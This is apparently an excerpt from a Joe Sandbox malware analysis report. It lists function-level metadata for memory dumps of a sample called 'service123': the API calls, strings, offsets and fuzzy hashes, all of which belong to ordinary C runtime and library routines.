Instruction ID: 9a959bd6a88986f811159d77b4fa73668a7c9c6ead7d63c619b6769d608c3e0f
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: 261191B1A057289FD700AFA9D680899B7E8EF44298F059A3DD84CC7B00EB30D58DC721

Function 007B8120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 007B812C
GetProcAddress.KERNEL32 ref: 007B814C
GetProcAddress.KERNEL32 ref: 007B818B

Strings

__lc_codepage, xrefs: 007B8180
___lc_codepage_func, xrefs: 007B8144
msvcrt.dll, xrefs: 007B8125

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: efc3f0fe2fe453bb07de08feb637417de383b4818af3bb07a88f95691e903fce
Instruction ID: a30815dcdee57a246306b8ed23ff2a07a51316bcdae2e6aebc3a71c86d34859a
Opcode Fuzzy Hash: efc3f0fe2fe453bb07de08feb637417de383b4818af3bb07a88f95691e903fce
Instruction Fuzzy Hash: 3EF01DB09092199F9750BF3D6D497DB7AF8AA04350F55863ED885C7300EA7CC845CBA3

Function 6CA39171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6CA3917C
GetProcAddress.KERNEL32 ref: 6CA3919C
GetProcAddress.KERNEL32 ref: 6CA391DB

Strings

___lc_codepage_func, xrefs: 6CA39194
__lc_codepage, xrefs: 6CA391D0
msvcrt.dll, xrefs: 6CA39175

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 6fc13191d43d1dd823ebeada04e81fcdd95b32b4693014a7f332121671179cd7
Instruction ID: 98f21472df4a380f5c021b159936be5c27af3ce5be0c1b32fb0b5913c035f882
Opcode Fuzzy Hash: 6fc13191d43d1dd823ebeada04e81fcdd95b32b4693014a7f332121671179cd7
Instruction Fuzzy Hash: 42F06DB1A492218FAB40BF7C9B5A26A7FF4BA05224F454579C88DD7704EA70C491CBA3

Function 6CA2EA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D60
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: 7d4668ea5c9ad2ebd145298919598cf147bd9f58aad65e4dd10d4e232bcc5a2b
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: DCB01231CC963C8A4A20557C07200D0630AAA1734630C6943C95EA3E04C737E4CB5062

Function 6CAC4AE0 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CACB8AE), ref: 6CAC4B63
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CACB8AE), ref: 6CAC4BA5

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: f1759ee402eea03164ef3a8a6f6e33aa7862b576ffd9e8587edbcbda05750d76
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: 666106B4A09705CFC714DF29C29062AFBE0EF98754F14892DE4A9CB760E730E885CB56

Function 6CAC0970 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6CA592A3,00000003), ref: 6CAC09ED
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6CA592A3,00000003), ref: 6CAC0A2C

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: 11332b8881af22c8cf42d2b462ad5d79dd3f1abe66a55f25cea7f4f806c85a89
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: D76114B4A09746CFC704DF69C19061AFBE0AF99354F14C91EE8EA8B761D730E885CB52

Function 6CAC2B90 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6CAB736E), ref: 6CAC2C03

Strings

basic_string::basic_string, xrefs: 6CAC2D0C, 6CAC2D69
basic_string::_M_create, xrefs: 6CAC2C1A, 6CAC2CBA
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6CAC2D14, 6CAC2D71, 6CAC2DD6
string::string, xrefs: 6CAC2DCE

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: 2a2f050704b4b3ebaf271c7af4fe0327ee12a2078b62ab97f26b81ab0b8b445a
Instruction ID: 6dc8c0e4dd475181097966730fd36fefa1fc71431e0d0c5b1f8137dd02f6241c
Opcode Fuzzy Hash: 2a2f050704b4b3ebaf271c7af4fe0327ee12a2078b62ab97f26b81ab0b8b445a
Instruction Fuzzy Hash: 6D7142B69093508FC300DF2CD58064AFFE5BF99258F59CA9EE4889B316D331D985CB92

Function 6CA2EB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: acb00c88d286fca763275d67188ba9657f792691b85cd14727c0f2c1d237ce36
Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: 5C619F716493248FC714CF79C48065AF7E1AF88319F4C8A1DE8989BB44D738D9CA8BD6

Function 6CA3B060 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6CA3AF3F), ref: 6CAF5FF0
abort.MSVCRT(?,?,?,?,?,?,6CA3AE9C,?,?,?,?,?,?,6CAF6040), ref: 6CAF5FF8
abort.MSVCRT(?,?,?,?,?,?,6CA3AE9C,?,?,?,?,?,?,6CAF6040), ref: 6CAF6000
abort.MSVCRT(?,?,?,?,?,?,6CA3AE9C,?,?,?,?,?,?,6CAF6040), ref: 6CAF6008

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 5fc6a3bdadfba4c8ad3c9e8c0b19d203e1b01ad67a3c6e345338645a48cfad62
Instruction ID: 193e4080b51d17369a4dcde477b17148f87c32ada84e505ae6aeea9ebe2ff489
Opcode Fuzzy Hash: 5fc6a3bdadfba4c8ad3c9e8c0b19d203e1b01ad67a3c6e345338645a48cfad62
Instruction Fuzzy Hash: 554126716053248BCB00AF74D5912EAB7A2EF82348F14996DE498CBB54DB36C4CFC796

Function 6CA21020 Relevance: 9.1, APIs: 6, Instructions: 100sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,6CA21281,?,?,?,?,?,?,6CA213AE), ref: 6CA21057
_amsg_exit.MSVCRT ref: 6CA21086

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: Sleep_amsg_exit
String ID:
API String ID: 1015461914-0
Opcode ID: ad3fbf13a14aaffc01002b566c82c6aea30d5448047254013c2d8b5f984b7388
Instruction ID: 66c2e62d8ad973fd5c4009886075b197e26a55fcda6dc1225ffbd959d21dd66c
Opcode Fuzzy Hash: ad3fbf13a14aaffc01002b566c82c6aea30d5448047254013c2d8b5f984b7388
Instruction Fuzzy Hash: 5031B47070E2608BD700AF69C580766B7F8FB46349F18852DD6449BB44D77AC8C8DBD2

Function 6CA41F00 Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6CA41F18
strlen.MSVCRT ref: 6CA41F22
memcpy.MSVCRT ref: 6CA41F3F
setlocale.MSVCRT ref: 6CA41F52
wcsftime.MSVCRT ref: 6CA41F76
setlocale.MSVCRT ref: 6CA41F88

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction ID: e1fd6f8ffefcc81680cf8da1b24c1011588599992b55258f6b2d021f8fe1968a
Opcode Fuzzy Hash: 424b18269c9568b601aa084ce7b792cc48ee0dbfdd54ac89f4617c58107e666f
Instruction Fuzzy Hash: 9511C8B09093149FC340AF79C29465ABBE4BF88754F41992DF4C8C7710EB789889DB92

Function 6CA41C50 Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6CA41C68
strlen.MSVCRT ref: 6CA41C72
memcpy.MSVCRT ref: 6CA41C8F
setlocale.MSVCRT ref: 6CA41CA2
strftime.MSVCRT ref: 6CA41CC6
setlocale.MSVCRT ref: 6CA41CD8

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction ID: a643954b77f6a4f933556a7f4a93941e7346cecb82b904ff496e8bcb896a5213
Opcode Fuzzy Hash: 6c6be702ecd5bb5de11d644345ab9c433beb98d3ffe32bd8be6ea1cefaf23c18
Instruction Fuzzy Hash: E611C5B0909314AFC340AF78C28475ABBE4BF88644F459D2DE9C8C7701EB7498899B92

Function 6CA2ED31 Relevance: 9.0, APIs: 6, Instructions: 19COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D65
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6A
abort.MSVCRT(?,?,?,?,?,?,6CA2E2F4,?,?,?,?,?,?,00000000,00000001,6CA3008D), ref: 6CAF6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6CA3038F), ref: 6CAF6D7E

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction ID: 620c6d60217eabe33493f111062a387e8f08e757196f536adaf671c6342d8150
Opcode Fuzzy Hash: 43ff2732fdef0f94484c1c8e9571a78a07aad364bf0272b15e68b5917b8ab3da
Instruction Fuzzy Hash: 28B01231CC857CC5CE2055FC42203E6A20E9B03344F0C190BC66AE3D08CB37E4C74196

Function 6CA3E0D0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 130windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32 ref: 6CA3E117
LocalFree.KERNEL32 ref: 6CA3E14B

Strings

basic_string: construction from null is not valid, xrefs: 6CA3E1A7
Unknown error code, xrefs: 6CA3E18C

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: FormatFreeLocalMessage
String ID: Unknown error code$basic_string: construction from null is not valid
API String ID: 1427518018-3299438129
Opcode ID: a866c7ffda5f12935f53fa37d12fe3322fa73696c012f8d8a057ee51cba30b27
Instruction ID: 0d73b4e9a06e4e3f62f663b7ac5688847ff4ce1d9b813edd6822c7adcc12bbf5
Opcode Fuzzy Hash: a866c7ffda5f12935f53fa37d12fe3322fa73696c012f8d8a057ee51cba30b27
Instruction Fuzzy Hash: E34168B2A097049BCB00AF68C5856AEFBF4FF85314F44882CE4949B714D774988ACBD3

Function 007B2F89 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 007B2E97
fputc.MSVCRT ref: 007B2F07
memset.MSVCRT ref: 007B2FC2

Strings

o, xrefs: 007B2FCA
0, xrefs: 007B2FB7

Memory Dump Source

Source File: 00000005.00000002.2673593055.00000000007B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000005.00000002.2673579668.00000000007B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673608285.00000000007BA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673622881.00000000007BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2673637354.00000000007C1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7b0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction ID: 58ac374df3fe103e5a9937df1422c8a507a0175f36743d9afb975825ef4587ec
Opcode Fuzzy Hash: 448672419a6aefb592f870ea4cfb86913ff9ea238fa630640188f8821d0f5d8b
Instruction Fuzzy Hash: F0316971A05305CBDB10DF69C0887EABBF1BF58350F148A29D999AB352E73CE942CB50

Function 6CA33659 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6CA33567
fputc.MSVCRT ref: 6CA335D7
memset.MSVCRT ref: 6CA33692

Strings

0, xrefs: 6CA33687
o, xrefs: 6CA3369A

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: 0$o
API String ID: 2944404495-4157579757
Opcode ID: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction ID: 577d1c2fea332e734ff5d051ebcdb3ff7fe1c3a65fb95ffe34053caaa616fc49
Opcode Fuzzy Hash: 4e5d1ba6c8a4e8df9e646095398d9879c6dbcde4af08328c22bcc6dcc1e4ca11
Instruction Fuzzy Hash: 1131397190E2258FC700CF69C1A47A9B7F1BF48314F189659D5D9EBB41E734E8868B50

Function 6CA29490 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 375stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 6CA294C2
strlen.MSVCRT ref: 6CA29616

Strings

_GLOBAL_, xrefs: 6CA294B7

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673885280.000000006CAFD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673901345.000000006CAFF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673934714.000000006CB48000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673958255.000000006CB49000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2673972662.000000006CB4C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6ca20000_service123.jbxd

Similarity

API ID: strlenstrncmp
String ID: _GLOBAL_
API String ID: 1310274236-770460502
Opcode ID: d7afb110431109910728780945440869aa9e573ee30d320f5b0e064cce3c966d
Instruction ID: 5283ea5e950a20686769eef5e6fba84ddc6085e7ea6ab5be62300b06bb8e1798
Opcode Fuzzy Hash: d7afb110431109910728780945440869aa9e573ee30d320f5b0e064cce3c966d
Instruction Fuzzy Hash: 0FF17D70D052288FEB10CF69C9903D9BBF1AF46708F0C41EAC489AB645D7799AC9CF81

Function 6CA9DAB0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 229COMMON

Download Yara Rule

APIs

Part of subcall function 6CABF8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA9DA2E), ref: 6CABF95D
Part of subcall function 6CABF8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA9DA2E), ref: 6CABF988

memcpy.MSVCRT ref: 6CA9DCB5

Part of subcall function 6CAC2530: memcpy.MSVCRT(?,-00000001,?,6CA4749E,?,?,?,?,?,?,?,?,?,?,?,6CA48E25), ref: 6CAC256C

Strings

basic_string::append, xrefs: 6CA9DDB2, 6CA9DDBE
iostream error, xrefs: 6CA9DD08
Unknown error, xrefs: 6CA9DB08

Memory Dump Source

Source File: 00000005.00000002.2673773718.000000006CA21000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000005.00000002.2673753776.000000006CA20000.00000002.00000001.01000000.00000006.sdmpDownload File
